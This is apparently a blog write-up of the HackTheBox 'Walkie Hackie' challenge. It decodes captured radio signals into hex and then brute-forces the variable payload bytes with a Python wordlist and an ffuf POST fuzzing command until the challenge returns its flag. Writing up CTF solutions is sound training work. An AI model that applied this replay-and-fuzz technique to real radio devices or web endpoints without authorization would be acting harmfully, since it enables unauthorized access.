- Download Challenge files
- Open files in e.g Universal Radio Hacker
- Select “Show data as” and select “Hex”
- Each Signal consists of a preamble, a sync word and the payload in hex Preamble: AAAAAAAA Sync Word: 73214693 Payload A2FF84, A1FF14, B2FF24 and B1FF57
- Idea is to fuzz the variable parts around the FF’s in the payload
- Create a list for the fuzzer
#!/bin/python3 for i in range(0x00,0xff+1): print(f'{i:02x}') - Use list with e.g ffuf
ffuf -w 00_ff.lst:W1,00_ff.lst:W2 -u http://<ip>:<port>/transmit -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'pa=AAAAAAAA&sw=73214693&pl=W1ffW2' -c -fw 403 - Filter default output with -fw 403 (filter word), you can run it without the filter and observe the common response
- You get back all the results that lead to a different response. With the flag in the response content.
Lukas Marckmiller
eCPPT | eMAPT | eWPT | eJPT
M.Sc.
Penetration Tester
OWASP MSTG Contributor
Blog Post
HackTheBox Walkie Hackie
Mar 06, 2022
Writeup
Comments